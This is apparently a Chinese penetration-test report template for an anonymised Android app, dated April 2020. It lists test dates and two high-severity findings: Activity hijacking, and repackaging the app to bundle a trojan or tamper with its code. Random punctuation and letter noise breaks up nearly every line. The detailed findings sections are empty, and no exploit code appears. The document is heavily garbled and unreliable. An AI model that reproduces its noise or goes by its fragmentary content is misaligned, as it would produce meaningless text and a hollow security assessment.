% q4 X( i, n6 G1 u2 R9 T; t, p* ~" B: a& ^
2 p+ S) B1 q3 W
5 B- b/ y4 ?4 E+ V% _) M- b8 Y: e
! q6 |3 F( \$ w5 I$ L
! a% u; u: o9 A: ^" [* F1 p7 V
3 S4 {3 f, u$ R+ Q! G0 a/ p7 Q) U- V6 Z
2 V0 u- a }! }; G$ ~+ A; e! p6 ]+ y# B. W3 C: v
, h( K; ~( A3 O8 n8 d3 P& w5 r
' k4 J' `4 p- x. ^7 z; k' J 文档编号: - U! y, k7 W+ ^3 f5 ~, ?
V5 R( f. x7 m- J. A
v& T( F S$ X4 u; ]: P( U& t% T( x$ L, s' E9 L" O6 a5 h
7 I- Z5 e+ y- O$ x! F
6 R' I0 U6 b1 S! L3 g$ }& G
* j! }& P4 z$ Z1 k8 @
9 V' ]7 w" [" n9 D2 Z
) F6 }4 a6 r$ u4 F% B, _- x
( P4 ]) x$ Z7 p8 V) R& Y! X
- N* b: j: t, j9 d" k0 V! A; H
( x( }0 ~" w+ M. j0 `4 {
; Q8 }" l1 i0 I( ?' z1 _6 l: R6 T2 y" y& h5 B4 ~9 c
' e% J+ \( O# q. a0 S$ F3 p
% O# Y; c- }/ a* S w
+ N/ X; }1 H6 d% E5 T( ?9 ?# H: `! w8 o+ q
9 f, I0 z$ _: _
; S. B8 U& F$ c. w4 _
# f9 e; x! I. [: k" v) J; R7 N8 q- v0 ]' U
0 y5 b! r3 ^8 I$ J8 ]' d2 H, \9 v- \/ _+ l( g) L% f2 U
3 |9 D9 v/ Y; G9 I( O. m
. Y' M3 w' E' i/ j3 m' v B! _2 X9 v
# P5 J T0 e9 o2 |9 l
2 R1 J% g4 f: i& b+ x
0 M. Y) q" l `8 c+ E
& j3 y; O- r4 n& B
/ S2 ~7 U& }8 C3 U6 }8 `
8 O% E/ T4 y. S+ H& n) Q
0 r( j1 p% o. z/ d
) ~. I6 g5 f4 \3 E! \; `
/ U$ T# r) p- ?, {( Y3 ]4 a3 g+ u' R! C! `$ ]
某某某APP渗透测试 # y( a( X+ O2 Y9 X! R2 \2 q% t
8 ~6 @0 ?) @7 U& h( ~3 D2 Q
& C- ?+ l6 x) y7 K& V. O
" v3 B( g5 Y7 k1 K: b* N8 F7 I
* m( D9 U- K7 i$ D, ]( U4 b
. F+ L+ ?0 ~7 Z( Q( G! y $ t; {0 A4 L9 S- z6 s
, b! }7 h+ ?- f# t6 Y. q# m
t2 } u" b, D# i8 b. F. T) |
# F, E6 a. ~( L
. _2 G u7 p3 l0 q4 r' p" n- ~/ R8 Y" j% j. n
& s7 |+ ~( R5 ]) o3 h: f
8 M5 ^: P0 u" ?8 K6 p, d2 W
( e! @' r7 p4 f
' N1 R2 k( J2 c4 T) b
8 e K5 }! P" |1 H4 Z
$ _# c5 ~: I6 \9 O$ n
1 f5 g# ?# M5 J. a; n3 i8 ?) r: E: R3 J5 Z R2 B
3 c% [. w0 U& @$ `! w" E- p
" G4 h9 V, S! t! i3 n- y/ d3 b P
7 Q4 P, |% {7 o" S- r* N' |7 h( c9 O. v+ W
: O0 Q9 {- j9 P6 `
0 k4 h% s4 l$ {4 H0 M& {
8 @! B# r3 `' Y# A9 ?
. a! b1 C4 X$ D) A 5 r7 S8 S& a- j0 {, S: o6 h
+ v' ^* G+ C& v 技 术 报 告
9 {$ b7 \* |. R# i1 b7 ?9 T3 X$ D( U. |2 L; Y; Q0 t: c
8 N0 L4 X- h# N# p
8 e& J" Z: h0 m: y3 A7 Z3 Z
- ~$ r$ c. f" h ~$ @+ ~! I; w3 m0 z- z- r8 t5 D2 U) A" @
8 C) g! a& J, k7 S I' M: U
( m" J* {0 _: j, N( S0 ~4 e, s
2 v1 |5 [& p' h. q: _
2 c# `( I% t/ T7 J( T+ M . _1 {2 ?* q& g7 O
, x% _, Y; {2 _) N. b0 k4 P
; P, o. t: p4 `/ P9 s# i9 Q* X b" W+ Y. m. p3 i( d- Y; B, q
% S$ L: a& e, j
! r2 m% i5 L: @7 Z
7 H7 a+ b7 E! f- J# |. N" ]
6 X9 Z3 V' j5 d8 R6 y- H ( |( t) H7 R7 ?1 h9 W* L+ \
4 [* ~4 V; p# S# t9 D. \' S: F4 [
# N% V! A# M# q& z
: i- W3 Q/ v( i7 O/ m. X3 J 7 T8 U6 D1 G) N0 Q0 s1 w P
\# m: g* X. Y: z, G
4 ~, }( l, a4 ~. v4 B2 a1 W4 G- y) H1 A; p2 X3 K
& g* A5 W8 O4 X! U; C$ S2 s
& B9 D4 c' k* V+ o5 `6 N
0 o9 Q+ J; R/ }1 c6 K6 b: D
* X7 A. U9 G- Y * ]8 T. Z$ N m$ K
6 Y4 e, \6 V2 R/ ]9 a# h
, ]# h- Y. g* o) k _ o4 Q, q: }- W
. K8 I" l+ v: t, G4 l* h; q1 ^" A9 W3 B7 v/ ^( s! A
" `0 |% N* {3 O8 X& v+ C9 _1 e0 ]# J/ W" I. d7 r2 L g
0 N( v# ^, |3 q( M- h# M; x* T
2 o. J7 o C2 @+ E X9 J4 X
) h. ?# D) L+ [* `% E8 j; T+ {; x: K |+ k; a8 ?
0 y. F5 Z- H1 @4 a. y
$ E. ^2 U. u) d" M8 N/ d( E0 c
4 @; ^0 {, I: C6 I" v8 v# o7 g, ?2 Y2 z; q1 y
4 B' M1 d+ w( P0 E
3 a' z+ f- I. s2 Y. a% N
( R7 y e; L! P# L) c7 N+ H1 f+ y$ R$ r {
$ r; D! |1 Q- o! \' J/ W; C. A0 x9 P$ E9 `6 c2 Y) f% D
' K }, Q/ K, b G* \; w9 O
1 z- _8 q/ B' L, I
: S) L& e& ?2 c9 _% }
' T. ]4 E3 I. q1 T* Y
2 Y* T- f8 o9 L" o* u- z# I6 M0 ^1 ]; b- g+ h
8 m' ~5 K$ S a) B- v; N, t& r
+ w! o' j9 @) l5 B4 b& X- [ . o& g& @$ \: f' P5 d6 ~
6 `% f7 M3 O. R/ o
7 |) U0 ?- `$ z; `$ n
& [% K! x* D# _# b U
6 P9 x. m& M7 [ n8 n5 `
6 N% y( v Q! p% u
X+ E; y! [5 y& ~2 p
' W4 b0 e/ I$ j3 s" d% z0 `' i
% L/ E4 T; V' B( J
! c0 p! B7 x J1 A1 ~" [( f
5 l7 o: I# }7 I. {" X
7 ~" C2 Z1 ~+ p) P' m
7 w) l# U6 v# j+ | V
3 e6 y: Z" q+ Y2 g3 h: q2 q: ?- ~) ~/ `
5 x4 d$ |7 h2 ~" ?# m8 _
; \+ D# F' s' [. r
* M. C! [! w) K5 x+ L7 ]3 u+ l$ n* ?) \9 y v
, z' X' ~+ [ \0 g, B; _
- w$ F4 h4 q4 ~* \
& [! c: v% k7 D, z; j6 v/ j. ] T
( t# [8 I' n$ {' `$ B
9 N, O" a, [3 I8 E w! m& j
7 T8 z- r% d0 S1 p7 X1 u+ G" R/ {- W8 o( d1 ]
" z* F( I" u- R) F# n) f
9 s% p9 i6 M7 ~6 K5 }. T' q g0 r0 X: q- s! I6 N% ?
& Q+ b9 r% I. f
' s6 c! Y, t5 T0 ?
! l+ j/ y- V# y2 [
! E+ n9 n! Z3 n4 \! C1 i) w
0 U7 s* }+ Q. R( L3 \
3 `" o) N! a- l. V
# {2 ^9 S5 ^% b1 i" i' \ 4 B) s" i2 ]8 a, `, P1 Y- l$ |
! v: l2 s; M7 C1 Q- j
2 g2 ?5 o% o! Q6 j% x8 }
: z' h `6 O$ w! V2 w
0 F" W! s" f1 I& k1 ?, i8 T
5 l8 V& y9 Y4 X% B 3 q( g) a, L2 f% \# n
% M+ _1 e- i) J6 v
( j& F: I# F( h- F0 ]) i5 ^; N
% Q( W& ]- j6 v* l
. u& h% a" z# Q
, z0 k* o+ \, B3 n, B6 W
9 ?! _) I' G' {2 n- M T3 f% i5 `: e% s* B }! B
$ F1 S1 u4 O9 _0 M
! L# Z" i+ C! h+ N6 d0 T' [+ I 4 x, _: B- s C1 d N
1 g0 {' A$ P# f
二〇二〇年 ) j( d; m/ z+ ]4 G( y% H
9 J! e0 ?/ b" C1 @3 s4 P3 s, @
; x7 g! Y& s" `# {; u/ f+ h3 J8 w- b- j" B
' k) `6 E2 Z, `
4 c- M: |6 x& b1 L8 C
5 _2 j* e9 u+ y% `
& [" M% T: P7 z3 Y' h( \; b
5 |7 O( J: H/ z9 H& E' R
4 d& H1 o: \# Z/ v# [
& r4 K5 G, W' c9 G( t0 n
! q5 C5 {/ n% J
6 N7 Z! F# f3 P7 X2 p7 f
; {% R/ M$ l5 k/ ?3 N
8 W/ h& {7 i7 h, }# C4 g6 r2 n% X2 q
$ c- y' d6 j' d3 D8 m& c$ h" K9 U, n0 L7 a( u0 a+ `) f5 l
5 R3 L6 X% {' n5 X+ y" S3 g/ h+ r2 m5 w6 e" X3 l
3 S3 G$ p2 M& Y, k* C/ _" y" b/ M6 K; B9 A% B' L
目 录
2 H" m( I; c" N! E7 ^+ c
6 H* _# @1 p) F; \$ C2 A: @
+ N, t# u' n+ ?5 `0 u" ]6 n( V
7 j) V" y: H$ b2 y
6 e" v `7 D9 J
1 t/ _7 [6 ^1 N1 c: L
# H5 d% O8 K7 s/ t, k3 m, H) W6 R; T2 _0 \2 L# z# H% u
% ]& v7 _; l3 Y. v
9 j! I6 \* v& F
, w$ d$ c- x% t/ m5 N G, ^
, y# c4 z9 ]! F* }: ]6 L$ x: F" p 1 I. l% F1 E ~8 Q" ?# O$ ?, f8 D
6 l6 u& v& ^( q9 t) [6 Z
1 概述... 3 # R) R1 j9 t7 X3 f$ R3 O
4 e# f- U, v+ D6 I8 q' T
; P3 S1 J! V6 |, h0 E- {- O, V
3 ~; a. f8 B- v% H" p
+ z/ [1 c; C# C k! W
1 e+ n$ Y# [4 J! T 1.2测试时间... 3 : @/ O% c9 w2 v, [
: Z" L4 \$ I' N- z6 W5 S; t1 q
" Q: F; R( ^5 L4 Z2 m7 P: C& X6 P% \( Z; X3 |5 i
2 ~( E" |! {/ {; K2 n5 J; @# x- M& V
1.3测试对象... 3 - w8 ]6 n0 H, b, G; r8 g
9 Q* @2 ^1 G, J$ u7 I2 A5 S
& o5 a) b" O, d& F
. v. P( N. Q$ n% C. M' d
! o2 c5 G; ?- N% @- P1 O
6 X' w. R7 ~6 K& p4 E! i2 W 1.4测试结果... 3
t( a1 H* `0 a% `4 H+ `, Z- \5 R# I, W1 o
) E5 A' e$ q$ l! E- O1 m* x5 E- k0 P* h. D3 E
9 @5 }, p% R! b
" w( d4 s, Y1 O: i& X- v 2 检测结果... 4
- W$ G! c& F; n% _
. r2 l7 c0 n1 m! v
$ P, \ X# u2 a9 M# e8 U, o: p
) Q+ S, C% I7 O. O1 d( C+ R" [3 D
- E5 O5 n5 H4 H, x
( D, A- t7 p) J$ C; p 2.1 某某某... 4 . Y1 m) R5 R) c, f$ _- K1 f9 p2 ?2 @
/ ]0 T8 ]# _! e- y- h/ l
. W. `) T6 q# Q( w/ O
# A* Y- V" E" N* ^7 g; c+ u
; X0 X; K1 P1 G1 X8 y
2 n! s4 {* b( [) V* _ 2.1.1检测目标... 4 * U/ ~" _" F/ t8 |$ O( [
: j( R- A- r! P2 G, k
% D+ ?+ B3 X$ b* y5 w; o* b( ~0 m, h. R9 u
Z, r+ z* E- m$ y7 I7 l7 N4 ]3 a" V5 x
2.1.2检测结果... 4
6 T+ G: s! V/ Z; b3 z* X
9 K1 R/ W8 n' J9 g9 D. O- O* W- L
) g& J! E$ V+ {
, u( Q: c( B, {$ g
2 E6 b6 N. |- f2 B, ?
$ e. s6 h( Z% |, F) _; q 2.1.2.1. 4 1 m& k9 l9 a/ k7 G/ H* Q
% U& ]# [% f. Y* J
; D' |! f( w- P0 H4 f* N4 w1 z9 r. \/ a! m! U: L" n7 f
$ j. l' Q/ m x+ c8 ^
- x) Z0 d0 i0 b4 y, F- n5 t% r 2.1.2.2. 6 1 S* ?, R$ G% e8 Q
6 w& X9 S) \% H2 b& h0 ] O. h
3 [; Z* M) a V4 V5 k' F
+ c1 S1 O- N* T& f% Y# ]* y! z, @: q 5 j% v. I7 e, E
% i3 f p$ N& h8 s8 n, j" @
6 I: f# d3 ^# A& M& T% e
4 L+ p% a$ N$ J' F' s2 {
`! n; O$ Y! b' f
. l1 b! Y" r( A' D
4 j) G5 E0 v8 v- r) ~4 n/ `7 [ d& D$ O( g* L" D3 [' R2 R; K$ I
7 L2 x( n* ~( o4 R1 P
O3 s) N4 O" U2 f: e- u
- D1 Z# t/ M% k# s6 v% ?
3 {. p1 S6 D. X0 {& N5 I; }
, t/ s9 [; v$ @$ N; P, x, n6 Y# g% W* _- l1 n$ J+ Q4 R: t
* g* {2 Q k& e2 A/ r
$ u. ^4 z& M9 z! f 1 概述
$ ]7 M/ N) `- |- C& N9 j0 ?, `# }1 p7 F0 E$ m9 K7 R
: C# D* B# [0 b
2 U1 x0 \ B: z; q
6 D; r5 @6 w: q, Y' J( M7 R! v3 f. C# G2 ~. Q/ w
1.2测试时间
7 [* W; a: H5 P, ^; }
1 _+ L$ X$ e) U7 M7 M
. [: Q$ {2 g) r- ?
" I4 G7 N4 Y7 U+ ]; }% G
- k& L# D0 g2 q: w( l/ Q: F- B, v! f. W: ^6 S! a& _+ o
% p" m5 D: G% t& z/ R# i- u( o
9 d0 v i" C: X- _; F5 t; ^4 ~ o ; n: Z6 {8 K# w, i' Z+ y8 ^
- H- t: l3 ]3 S, n8 h) t) M |
+ h5 p6 i+ R7 D5 K4 H7 A
* `0 m% l9 a) L1 W) m! r3 e : J3 o: f& F- ^, |: B# X [
( k3 a; f# P- l1 [# ]* M9 `2 M- c 渗透测试时间 3 `# j' p5 I9 [
* A7 E0 U7 k& p" `
! D1 t8 T) F _5 t: g4 K3 J1 f @" H0 y" K5 G) g4 u- F+ D
| 1 a* ~% n$ q( b" ]- J4 {* u
* W: `3 h' N" N
& f, y, c/ U0 u& I; A
3 r( X. c, @% j* E
$ Z2 B7 X! e! g V' |9 T" q! o- w9 N6 l. l' d; z" p. ~
| ( A# f E$ n7 A( H9 j7 j
3 K0 x5 G j* r- v! ?2 s' P. [ 5 X$ R: f/ K0 x( y& ~* b3 v
4 [6 S' { B7 W8 x 起始时间 7 g/ [( o) y4 H% C2 d; y: [
/ t, @/ X# i$ ^4 Q. z: w5 P
" k! C3 \+ t8 ] E- U
5 w% c! h1 r! Q' C8 u& c& k+ W3 p, F | , ^9 R3 Y. X3 e4 n! [3 }) l7 b
! {4 c5 }8 ~8 y4 a5 O
1 H* H' p5 J& I7 J
: u" S0 Y; I7 u* S* E : K4 [4 |0 k' R0 g0 Q
! j2 x6 D- F1 v [6 a& {2 A! u
2020年4月6日
) x6 {: P1 D( \# H& c% ^) [, ]# V/ k$ D; x$ l
* m* _/ m' [9 V. c# b4 |0 i; B: N/ u+ _9 a" {+ a2 m2 B
| * {* S* V, e$ b" h+ Y
/ y8 n4 @5 K& [1 I
1 X8 b. ?. g1 W4 P. N |* h, n+ M1 i/ o( J5 k
1 l- }( o# X) R/ u$ u6 j1 S( f
6 i2 z, o4 d. G |
) u" M _. M; K6 Q5 }- v
! i. v& }1 i. [2 a9 S
# \6 T! M: e9 I/ `% X1 A# @: Z! f8 F1 U% X, l' o R# A6 h2 E0 g
结束时间 + a' i) f2 t( | i! F
7 O" s5 F7 V' l$ l: i1 g& M1 x - u2 I1 y0 ^( |" a% ^) X
3 p3 M* h( t* m- ` | ) R3 B7 e" ^! v3 b) c8 v
$ ^3 X; D! U' ^ T" e
3 ^) j: T" u2 l0 Z0 S
( f# i) w1 V- o1 H7 X
9 q+ m. S' s( P L" G$ ~: D
4 w/ ]8 `, [9 y& I$ l1 s
2020年4月9日 ; T% y8 x1 D; E$ q8 D! n
0 L; r& B: r5 ]. G. z
% H& U7 g: \" I. ~ M' Q, |, K% X
& P. E6 o/ P. f) B* `& k$ a
|
& M4 t1 M$ U; F
$ c. p1 N4 y$ m" c
c( m1 n; K, n" n5 y
- {9 W& b$ d- R v' W9 g- z + C9 d' T$ q, ~0 s% m4 d! ]
( p8 f8 e5 m$ d' C' s: j
6 q0 G/ R, h3 j& i6 k- B
! j2 R1 a* I6 R0 j, O0 \) L2 X
6 B- a' H2 n$ K" s* V( B5 i
8 D, A, W0 {" L4 j3 h 1.3测试对象
6 r( f9 g* L2 X8 [1 f* U: c% m' T4 U5 I! O# ~9 e {/ }* k% G
9 X: j4 L( f! X4 f$ m0 c+ m
2 Z P* ]/ h% P) H. s+ {: E 8 y7 r% U/ ]1 I5 Z9 N
& D7 G- o! r" b! @3 V8 _' _0 S0 V 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
8 ^6 l" E1 p3 Y, n( K+ a
+ }9 T& G% I, j
5 ?5 D7 a5 b* ?
" j3 k* b7 Y5 ^; f9 _7 H' c5 Z
+ @4 z! |6 O* y
4 K c( E) r# _& T& P* k6 `& i
表1-1 检测对象 0 l' @7 s' K s+ F& H
9 j2 m( \6 m0 X& J P
$ c5 p" a# @; \/ \1 n A$ n% y; D' H( C4 {% t$ k
- H+ I+ u0 R3 {4 b" g( `) m+ ^6 _$ M$ o% `0 O7 c0 ]* p* x
) l4 C7 u) u c5 X
4 n% @1 V4 S5 T ~* B
# R, @, H7 N8 @* R9 U( W0 S- c" }6 a5 O6 p2 m
|
0 y) R* e: J' S6 T3 l
% P+ P( S- M4 W+ | ( l# g. t, y6 Q
% Q# p* {* N' m* B# J5 l 序号
6 D1 i! `. {: W' J! i( K
r' n8 l/ w( g% H/ Z
% z r" A& j# ]
. R) ~! @$ X, k! d9 b | $ K+ @2 s2 ] k" {: C: A
2 T c3 q" \% V, P1 Y8 y% t- j
6 o7 Q+ ?' v2 r0 l. ?/ _
5 h1 Q2 [7 l. m" m- ~
$ {9 U: h8 d& J1 X: k! x( \! J& Y8 T" N6 G
测试对象
' T- A1 ~5 A% U3 L) _& O
& W! i5 f6 Z* p0 N+ k$ e: u8 i 4 w, d, g% A: Q& U: N: j& l
0 p) o& j5 @% m" y/ a | - O* s/ x3 a/ r% C G$ A; t
) z" Y1 J/ _& S5 o
8 }* G$ H3 E! Y! x" L
. t# ?$ k$ `0 Q k 1 R( p: B( |/ d( d6 E
3 Y: T. [7 O; t( G$ [
测试地址 7 A- L1 T8 y; K) n
4 a9 s) _4 ^5 k7 j( _" r' `# @
6 G) k+ M$ d2 \- {) f: O4 m$ O, l/ [% f8 k0 }6 X0 J
|
! X# C, Z& A$ d i7 Y" K3 U7 n' W4 c. I. {2 \0 o7 q! I) w0 Q
. k8 k# V* J- ?& D9 v
9 p# x: h6 Y8 g" w) ^& E7 b2 A 9 ]( t8 [/ A/ J- `: {, ~
( G6 y8 k- S6 ` u7 N) t 安全漏洞 , P5 m5 a; @9 y! T' B
- ?% \( ]; j4 F J) ~ P/ f! A; h
. j* i2 i, g7 J
4 {; \6 F$ V5 W/ {) u | 1 p4 s3 w/ g4 |" ? n" h0 Z
, n5 S8 |( G! q) w" h3 e
- ?( m$ {# Z; O5 m% l* v: R( W
9 p Z0 ?: s' ^! Q8 R9 r1 _/ q
1 s7 s9 j* j/ x% u/ S4 H, y+ ] m; @4 q' m* H) a
|
p: m2 x" X0 ]4 ]3 K1 A F- f5 S( p0 l
5 b; C# w& o$ \" j G! l/ `: Y- {) o
1
' D# X/ r7 [9 G% R" Q/ u+ N) D; `; P0 R/ ]$ p6 K
7 `2 w5 A/ C, ~, w0 E- u, ]1 S
- q, I' X1 P: z+ S6 ?9 j* ^2 W* [ |
1 S6 q1 b; r6 |2 f% F9 P. ~2 Z
8 V2 B% h: e8 {0 C 0 j) C* Y( T- k3 H' l0 L, l
" H8 m4 V5 j2 s6 U ' E5 \% N0 m: Y$ u ?1 P( n
& y a8 I" X- x2 N$ p
某某某安卓APP % f1 o0 I3 N+ x. a5 U8 C! C
5 G3 b) x8 q4 b( q: H( M9 X, `* U
& y2 J, u1 I7 L; \0 k" R9 v7 f
/ x( A1 q/ [1 @8 k |
$ v) J3 ~ B+ o8 H, `+ q/ k- ]7 t; O+ p; Q8 f: b3 R
+ @- H! {" J c m
- P9 A n: W; {+ s; \
; {+ ^5 E- f) Y+ E% W2 M# I# t3 R0 g3 c) s) @, o0 t/ l. r6 g& R
: h8 R: C8 \- \
% L2 b$ a- y9 E( e7 g
! U7 W5 `6 x0 M* O; v9 i+ k0 @" D z5 N+ N8 T
| 2 ?' s" C) C& J/ i3 K. o
: c1 f* s ]+ a! R7 u* A 3 O$ w u; ^" ?+ J* h9 l- |. T
! G6 C7 B& `5 e6 Z
: X, @3 B% f2 Z
) ~( g3 Q {* |( d" x& S
2
@# e i; }% o J9 h' u5 _; R" e6 p7 |7 j
* O) b7 E* @! v8 C1 w0 x* r/ [ q$ w0 F7 [4 ]
|
# C* ~+ Y) `2 L% }
: S1 ?. i3 {4 L# ~4 l: l8 t* u) ?
6 F [3 N' v. A# u' ^7 O& a
4 \) H/ I7 b7 x8 r+ P, ?" z- c8 O
- g! T. T. H& m3 D
7 x% C- J# h* D. f6 O
! x [6 e+ Q, o% O, q
& w0 i% ^$ ~. j& D9 Q( s5 z, p ; u. q$ B* h6 H* K- u- a
4 J6 I" w6 O- ?! v
1.4测试结果
( j; R6 H! O1 M; D, n
! f Z F2 b; d) l
/ Q# R% o% B0 q& s- ?6 A: S6 g
# a' q1 V, \6 B. N. U$ E8 q/ v7 G
6 y4 C/ ^$ w2 l( i7 d/ a
4 a& i" V$ x1 g( u& C 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: : ]3 H4 h( S$ F" _6 L' {, [
/ X, R+ Y- S6 ]/ s. y- ?2 k
3 ?% u$ U1 A+ h2 V% e$ n/ A* X1 N$ H) X3 p; ^
' c; F. }2 D% B; B4 _
( @$ {( Q1 }2 |. w% _1 R9 F1 w1 k9 @
) J! U }( G1 u: ~; \+ F0 ?6 T
3 E& L5 @6 B* j
& |3 f: I; ~1 e+ m H! \6 _
8 l# u0 K; \, f
& z# v G! T, O$ g3 i/ j- r& E2 g$ ?
6 y( ^5 H7 J e" i1 B# L/ F; N* }+ Q! t9 e% _: J
) m$ }8 K5 {5 @3 A, |0 f6 C- i% v$ m0 V9 `: e
; w, l8 \- a1 I3 {. ~
1 W: T7 f! W) h |
" c2 O2 \7 U: P6 `" Z5 `/ g: y5 P# Z9 b% C' Q* m( `) y: Q
1 f3 j6 \" T. \$ @2 r8 h
! n4 Y8 j" `2 D O 序号
: q9 V# C! p/ i& Z5 }( v# H4 O, m9 t- ]! Q% \
T- Z* R) d+ b- |9 `
6 Q) T& F: q9 G5 h7 j6 A9 ^
|
* `0 D3 V5 W7 f
" S/ R8 G) [8 N! d
5 ]8 {: E" S7 ~5 a a! B
# ]* S& Q' s$ e J7 W
, k7 f i" f2 x6 G* r5 [! z; O' G A' f, A8 u
系统名称 + d! o/ n5 @$ W4 u4 f8 H
5 E7 S! ]8 [# x! p 3 b* H' F5 \1 R) Y. X
1 \* y6 T3 k* ~5 k% H* R5 l
| 8 P+ \) u* B" |* U
. X. `% [; U: J2 w! K4 O
6 `3 H* \! x+ y, d3 P C3 V7 C( k V5 n7 I) V* W! i5 G
; ]- H+ r5 U3 W" m
! L ~, [4 {0 `. j7 A 漏洞名称 : D3 `( H8 ~! B, q" z* J
, w$ V8 l" T" ~# w7 y0 a7 I
/ l4 L# B( T; w9 R$ z9 E# h3 S8 [6 X% [( E
|
, t# Z. B) p( q9 P0 f4 v& E. G
3 [9 H5 J+ H6 e# e0 ? 1 h. V3 f+ @1 b+ f" u
+ _. _( V, l7 R
- O7 e% C) i+ D3 N
' z4 x: Z5 v- U& r. ?7 p
漏洞危害
z' J# t5 g; w; h6 o2 c! d$ h6 R# L9 ^! Y7 x; Q, b2 Z
8 W! P0 N# g; B. p1 G4 {9 L1 S/ X% @
* B0 \$ w( k" } T |
& p: i& V0 }$ n, x+ E- R# q$ F
5 p/ c, A. P: F+ F
# N- ?/ H8 B% Q3 U5 H/ l) U2 J$ J) ]0 O9 j3 N$ E& D G: Q
7 {; B* H$ C1 }$ N
x5 u2 y2 R. T 修复结果
% Y' K2 [& m$ K: P1 ?, _' r* `. {
: H8 B: T: x5 ]' \+ ] d
8 j; o. J8 ^* s. ]; B1 \- w# n7 m" [+ S6 \; P9 _# t! ]
|
( M- j$ }* _, x1 v$ m& y0 A2 n7 z( ] C! d' q0 R% Z; i! C
4 ~4 t3 r0 Y$ ?: K+ K& k2 l2 v
# O/ t6 z( i( B" j/ Z7 m
$ C/ @# \( ^; `" \& q2 ^8 c6 R7 d j+ ` c! ^
|
8 ~9 Z) L; K+ W: r9 x1 T4 H. B. R
( s0 Y- ]# c+ o# c+ b5 O- o
* e6 M0 H5 @6 p, @& G3 z
" K, S r9 g. N$ `5 W 1
% H, o& t: a. ^7 m7 n& ]0 g! I; M+ U9 G+ }* ?
8 R/ ^9 d4 K! t- [ v# t# I3 F/ n$ ]) Q
| $ ]- B+ E! a, P0 x6 m! B8 p
4 U& c0 b7 U, X
1 Z" x. G7 [, z' w* e1 U& V
! O, N* x4 n# u: H$ a# @
, ^& p6 v( N3 m/ b# t$ @ ?2 J& }6 B5 M2 Z1 d! G* d
某某某某某某APP ) r3 E9 q/ r# [2 d8 R2 H I
. w7 |$ m9 q2 W5 S7 C4 X $ r3 o; o4 k6 |, ~6 w
. L' ]0 @/ }' |9 ?+ S
|
8 z" K1 J# e! j& d
6 J/ s/ \/ F5 j! v+ U8 } s/ l9 | 2 I3 N4 {1 _; K, m; r1 i0 N \
- t/ ^7 O: U# @2 |$ C! E/ l 7 E- h! p4 R! h a
% N1 q2 ^- k$ \
Activity 劫持
' q. B7 X: {+ f7 u1 @
; P7 C1 ^1 |. t3 B - K0 r3 ], K6 Q+ I% p. i# s8 s# w
- e- X+ k9 U9 |
' b, v* |" O; i# ~/ |' H7 N2 U5 o; E7 g B/ y" z9 k" ]
# H& f9 \4 `4 i
3 [" n/ Y4 c$ o2 E; A( k
3 U M; J% Z- F! t* f
; I ]6 V+ U) L4 @" o: N. h | ( q- G& `1 L; m5 q. F# k$ v
% c. H$ z% y5 L3 [
6 ]2 W7 j v* ^" P+ I1 I a5 w) `
% n8 I& |) S/ U- N' Z ; @! z ^9 J5 C# | H
3 X) \( I1 x$ h& _. ]. }5 g' T4 u- ~ 高 . @1 [3 x* i K6 N
2 @* ^# ^( E5 N6 P
x7 u! @( _* Z# ~3 o+ w
* p3 ~# p( x0 V- s9 c! k/ V |
- A5 p9 u; D' N" L6 O6 N% ?9 {3 X$ j4 ]
L% y2 q: c2 V- w. p& \0 j
: U- F* e* F) ]& U
* Q# ^: B! {! x6 V$ a: z
5 }. c# I6 u# l' p- {6 r , d! p2 @8 T6 V
' r/ b" M1 V9 L; P w
: G4 p. L$ S3 {( o9 @$ E
; o: r! [; b1 n! O6 ~ |
7 H) G w* G z$ v& V) c# y
& z L7 s& r' A) K6 w( m
2 j- m7 s# v( ?, Z% J: [3 s
4 f+ R/ D- D$ b8 i2 p # o8 J T3 g6 y% O0 h+ M5 c
2 z9 U% v. _' g3 u5 m) x( u | * M7 ^ ^9 H4 ?! F+ M4 F( K
) G% O# i5 ~2 `6 f. ~6 t
. i' Z7 n4 e! |1 n
/ s/ I5 v c% Z$ d3 w 2 ) W7 V; |3 l3 u8 i! F- w
: u1 w2 i" }# N# m* k
: t3 N5 Y& L( b
$ N3 a; x# [$ ^( {! b. k* ~ S1 W! ~ |
) B$ Z) U5 E4 g+ z
( p; s9 w/ |6 a! D2 E' ~" Q3 U
4 i$ ^8 ?) t1 a5 d& j. [( j/ i* _! t8 O2 E6 R/ @ c: |& }0 O
% U# O! ?/ r2 \1 U% w
9 }6 }$ f; n- | 某某某某某某APP
1 Z1 K- \/ ?. o, A! b; @ N- J- }: d, U& z: {6 s( p2 L. c
5 r1 T. E. s4 h8 |2 s+ C; z' I8 Z: Q$ C( s7 |- z# q# g
|
5 _% \6 w% u' r! H3 X8 D. E& a/ @
% f+ |; Q( L% ^+ T. m# K9 O
! v' _" H, P" H- C. ]
4 q! g7 ^3 Y6 V4 V! |% g' O6 j
: x, F$ |: k6 b1 u1 E* j 反编译二次打包捆绑木马、篡改APP代码 0 s& y+ b7 Z# Y+ l) e) p
- ^ C+ H3 d% m # f! f, P% U7 U+ x j0 _/ G
% {; d! L* l5 i. m& G' P3 M
|
7 _' m# F. q( v% r# L/ D! ]# G8 ]( `6 @( s' R+ U
9 y- b: I8 _8 ^& K* `: X" I6 m6 b, y7 u. ~
* v7 d0 ~, M2 f; c- L5 |( |2 r8 V2 z/ o& x
高
$ S$ c; c+ n# W9 u! a, N
. ?. g+ p S7 y) y ( l# v) E$ ]$ b. R+ S) {
_0 X8 k' _, t | ; s) @0 y& d1 n- d3 N9 L4 b
0 y6 O1 _& B3 L8 x3 ~7 | 1 `7 f3 T, @) ~+ `
) C' e5 X4 Z3 \+ @4 z
. L$ l0 n. o, n0 a- W, x e' ~7 u! N6 H# e B
* d4 H8 s% V8 D/ o% u; C5 u: h7 T2 ]# c9 N J: n# h- a0 L
" f6 }$ k' b" t+ [( ]% Z
4 `' W9 z; L! b9 o; }6 f | 2 e+ \2 e) u6 {% j' Z+ J# N
7 x( b9 H% H2 d3 y% x
; t0 I/ k3 F: M# R1 |( L& w2 M
) n# A+ q& _5 z# ` i& F 1 f* Z( P5 ]. }' }1 k7 U- [
t [1 S0 m% r" {) F
/ A1 }; w- k* R& E% e( a. C v# {; t
0 h% ~7 i4 g* g+ N; P7 p
& J2 i4 J G+ |( o# b7 s, R; q
^% [" ~: p2 y8 g' K* C2 ~% l Z
s F4 w0 ~4 Z3 [% v
4 e+ E. h- {- f6 [/ U3 T
H: `6 P! _1 O! k0 @; `. n/ U
" s$ H1 |) l. V, Y5 ^
